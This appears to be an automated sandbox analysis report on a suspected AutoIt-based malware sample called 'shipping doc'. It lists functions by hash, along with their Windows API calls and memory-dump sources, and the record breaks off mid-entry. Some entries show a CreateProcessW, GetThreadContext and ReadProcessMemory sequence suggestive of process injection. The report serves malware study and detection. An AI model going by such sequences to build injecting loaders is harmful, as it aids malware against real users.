                                                                                              • Opcode ID: 462c98ca4d51e4016e5aa80e20cc4ea3e8fc3ebb4f25007246e672e73bcdcf65
                                                                                              • Instruction ID: 0950522fde8469556166f88cce2ce4632aca60f2f8e931780365bfa06bb4dcf3
                                                                                              • Opcode Fuzzy Hash: 462c98ca4d51e4016e5aa80e20cc4ea3e8fc3ebb4f25007246e672e73bcdcf65
                                                                                              • Instruction Fuzzy Hash: DEE08632681310B7E2302755BC0DF8B3A2CD786B71F104224FB2D7A0D046A0158182E8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 000F17F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: CALL
                                                                                              • API String ID: 1385522511-4196123274
                                                                                              • Opcode ID: a3724b7e33637889130abd7d33e9713766818dd41b7a22fd1aff13581ac5a385
                                                                                              • Instruction ID: 03634cc1eae4aef171418d5c3841735f6aca29c1d36abc54a2995ae52c3bfc46
                                                                                              • Opcode Fuzzy Hash: a3724b7e33637889130abd7d33e9713766818dd41b7a22fd1aff13581ac5a385
                                                                                              • Instruction Fuzzy Hash: 51228B70608305DFC724DF14C480ABABBF1BF89354F14892DF69A8B6A2D771E845DB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00156F6B
                                                                                                • Part of subcall function 000E4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4EFD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad_wcslen
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                              • API String ID: 3312870042-2806939583
                                                                                              • Opcode ID: 47d75529b2352e78377259527be041a39f7ae85d308e06b022e99aca6793d013
                                                                                              • Instruction ID: 144b24f96409dd0794e90eac67d84462be8cc0f941e1831ac664027e23c5bb87
                                                                                              • Opcode Fuzzy Hash: 47d75529b2352e78377259527be041a39f7ae85d308e06b022e99aca6793d013
                                                                                              • Instruction Fuzzy Hash: 97B19331108641CFCB14EF21D4919AEB7E5BF95300F44485DF896AB2A2DF70ED49CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00122C8C
                                                                                                • Part of subcall function 000E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000E3A97,?,?,000E2E7F,?,?,?,00000000), ref: 000E3AC2
                                                                                                • Part of subcall function 000E2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000E2DC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name$Path$FileFullLongOpen
                                                                                              • String ID: X
                                                                                              • API String ID: 779396738-3081909835
                                                                                              • Opcode ID: 81e146419b7e16342f639ac4c879fe4492149ab9edb2bcfcb19116abb5d19c25
                                                                                              • Instruction ID: 90fa9671892b7aa4d998116dadd34948219113d6610b21e4deaec968835224c9
                                                                                              • Opcode Fuzzy Hash: 81e146419b7e16342f639ac4c879fe4492149ab9edb2bcfcb19116abb5d19c25
                                                                                              • Instruction Fuzzy Hash: 7321A571A00298AFCB01DF95D849BEE7BFCAF49314F044059E515B7241DBB45A898FA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID: EA06
                                                                                              • API String ID: 2638373210-3962188686
                                                                                              • Opcode ID: 9584638e96a3b0a9ca4d34a60a6bd3908cf3e438710d0a22814d5b0cea9149de
                                                                                              • Instruction ID: e60589c7f6fedc08718e92a77bbb2811d8f2616bf28f6ddc723f494d08fdfd66
                                                                                              • Opcode Fuzzy Hash: 9584638e96a3b0a9ca4d34a60a6bd3908cf3e438710d0a22814d5b0cea9149de
                                                                                              • Instruction Fuzzy Hash: E401F572804218BEDF18C7A8C816EEEBBF89B15301F00455AF592D61C1E6B4E6088B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,000E949C,?,00008000), ref: 000E5773
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,000E949C,?,00008000), ref: 00124052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 15049f17406b960456908546f5d6fc42ae520e6881dbc0c42eec017ac4194eae
                                                                                              • Instruction ID: ddce5c6ff11633f72fa97dd32b7e7875d5304fd2854defcfa6840867b087ecf6
                                                                                              • Opcode Fuzzy Hash: 15049f17406b960456908546f5d6fc42ae520e6881dbc0c42eec017ac4194eae
                                                                                              • Instruction Fuzzy Hash: 35019230145225FAE3305A2ADC0EF9B7F98EF067B5F108311BA9C6A1E0C7B458A4CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 000EBB4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID:
                                                                                              • API String ID: 1385522511-0
                                                                                              • Opcode ID: 4815779f4f715d34441873cda9a122b10735581d39a22c0ff9c84cf801a15982
                                                                                              • Instruction ID: a5d7936523a593e7c2cf851a77037a85b8298f887f7c1e69f65e3d37e8953acb
                                                                                              • Opcode Fuzzy Hash: 4815779f4f715d34441873cda9a122b10735581d39a22c0ff9c84cf801a15982
                                                                                              • Instruction Fuzzy Hash: 0232AC30A002499FDB25CF59C8A4ABEB7F9FF48310F198059E905BB662C774ED81CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01821ABB
                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01821B51
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01821B73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1781184900.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 2438371351-0
                                                                                              • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                              • Instruction ID: aaa7bf5874fae094714fbb7c76743d9fee4d37e1b4826dcd8ba708b8a538eb56
                                                                                              • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                              • Instruction Fuzzy Hash: 3212DD24E24658C6EB24DF64D8547DEB232EF68300F1090E9D10DEB7A4E77A4F81CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000E4EDD,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4E9C
                                                                                                • Part of subcall function 000E4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000E4EAE
                                                                                                • Part of subcall function 000E4E90: FreeLibrary.KERNEL32(00000000,?,?,000E4EDD,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4EC0
                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4EFD
                                                                                                • Part of subcall function 000E4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00123CDE,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4E62
                                                                                                • Part of subcall function 000E4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000E4E74
                                                                                                • Part of subcall function 000E4E59: FreeLibrary.KERNEL32(00000000,?,?,00123CDE,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4E87
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressFreeProc
                                                                                              • String ID:
                                                                                              • API String ID: 2632591731-0
                                                                                              • Opcode ID: f64a21527998a4538635712bf33af67a1fc3d2b80f69a850845ff6b32c0c5005
                                                                                              • Instruction ID: a4a0d93819d8fbdeb736ed34e44c1466558dec4a17edd4b6e6d433598d590cf5
                                                                                              • Opcode Fuzzy Hash: f64a21527998a4538635712bf33af67a1fc3d2b80f69a850845ff6b32c0c5005
                                                                                              • Instruction Fuzzy Hash: 7E11E332600205AECB24BF62DC02FED77A5AF50B15F10882EF552BA2C2EF749A559790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID:
                                                                                              • API String ID: 3347428461-0
                                                                                              • Opcode ID: 1dfa1d8f0a849528e1794698c3c42984730321dc3985bff3c8d5c2c8f85cd218
                                                                                              • Instruction ID: 71d7977eb53f41f603a9d70d1fcc497900633107530231514cbf32d5456283fe
                                                                                              • Opcode Fuzzy Hash: 1dfa1d8f0a849528e1794698c3c42984730321dc3985bff3c8d5c2c8f85cd218
                                                                                              • Instruction Fuzzy Hash: 9411487590410AAFCF09DF58E940ADA7BF5EF48304F108069F808AB312DB30DA21CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,000E543F,?,00010000,00000000,00000000,00000000,00000000), ref: 000E9A9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 864185e5d2b6f4a50ae6b2bb07a552f17dc8711fa779acccaebeaeabb24d49e1
                                                                                              • Instruction ID: 080d3fdf47e01775bf8df3b61eb5d48884b6d4c6f0a543b0d3a32d392f660059
                                                                                              • Opcode Fuzzy Hash: 864185e5d2b6f4a50ae6b2bb07a552f17dc8711fa779acccaebeaeabb24d49e1
                                                                                              • Instruction Fuzzy Hash: E21148312047459FD720CF06C884B66B7F9EF44764F18C43EE9AB9AA51C770B945CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00114C7D: RtlAllocateHeap.NTDLL(00000008,000E1129,00000000,?,00112E29,00000001,00000364,?,?,?,0010F2DE,00113863,001B1444,?,000FFDF5,?), ref: 00114CBE
                                                                                              • _free.LIBCMT ref: 0011506C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                              • Instruction ID: 9c8dd02fa0f0a015a967c9ef8e4cc0d5cf6133103ee30c5c20666ce9b3679f41
                                                                                              • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                              • Instruction Fuzzy Hash: 36012B722047049BE3258E559841ADAFBE9FBC9370F25052DF19483280E7306845C6B4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                              • Instruction ID: d2620209213d7a6693f367208c4d638242aad345e86c555162caa7e08c23434a
                                                                                              • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                              • Instruction Fuzzy Hash: 64F02832510E1497DB353AAAAC05B9B33D89F72335F110B29F4A1D31D2DFF1D8428AA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,000E1129,00000000,?,00112E29,00000001,00000364,?,?,?,0010F2DE,00113863,001B1444,?,000FFDF5,?), ref: 00114CBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: d1cdf91332a40000380ece0e7aca83dab693cfd21f434804be888caf51fd4529
                                                                                              • Instruction ID: f87a22dfb688a4f5b4b07fa120188090657180dad9804e38e17f74aed7fd994d
                                                                                              • Opcode Fuzzy Hash: d1cdf91332a40000380ece0e7aca83dab693cfd21f434804be888caf51fd4529
                                                                                              • Instruction Fuzzy Hash: 0FF0E93160222467DB295F669C09BDA3788BF51FB0B154135BC59A65D0DB70D88196E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,001B1444,?,000FFDF5,?,?,000EA976,00000010,001B1440,000E13FC,?,000E13C6,?,000E1129), ref: 00113852
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 93307d8b1e75a2b0e3bd630224c8965ba14dd97fe34f56c574dd244c8094d78e
                                                                                              • Instruction ID: 9fca07d00f746f88232fb688b22e2daaa683fb135fe21ea40e7327404b57be16
                                                                                              • Opcode Fuzzy Hash: 93307d8b1e75a2b0e3bd630224c8965ba14dd97fe34f56c574dd244c8094d78e
                                                                                              • Instruction Fuzzy Hash: 1DE02231100224A7E7392B779C05BDB3788AF427B0F060338BD78928D8DB60EEC182E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4F6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 594d729acd3b346010b60587f49fc72cc458fc7814b26211106db15533881947
                                                                                              • Instruction ID: 4b26e404e029dfa0ae1e8facc78af9a5ea0f665ab751f7ecd18cfae2608c900b
                                                                                              • Opcode Fuzzy Hash: 594d729acd3b346010b60587f49fc72cc458fc7814b26211106db15533881947
                                                                                              • Instruction Fuzzy Hash: 6EF03071105791CFDB349F66D494816B7F4BF14719310897EE1EA93911C7359C84DF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000E2DC4
                                                                                                • Part of subcall function 000E6B57: _wcslen.LIBCMT ref: 000E6B6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongNamePath_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 541455249-0
                                                                                              • Opcode ID: 483f2945dec248446273f3af509207e46dfc64187cf98dfdde97a1beb009645e
                                                                                              • Instruction ID: 242a0333014ffa3de6380677a091ac7beb224ceec8ba0fccdbe9e9333e366522
                                                                                              • Opcode Fuzzy Hash: 483f2945dec248446273f3af509207e46dfc64187cf98dfdde97a1beb009645e
                                                                                              • Instruction Fuzzy Hash: 4AE0CD726001246BC710D258AC05FDA77EDDFC87D0F040075FD09E7259DA60ADC48590
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
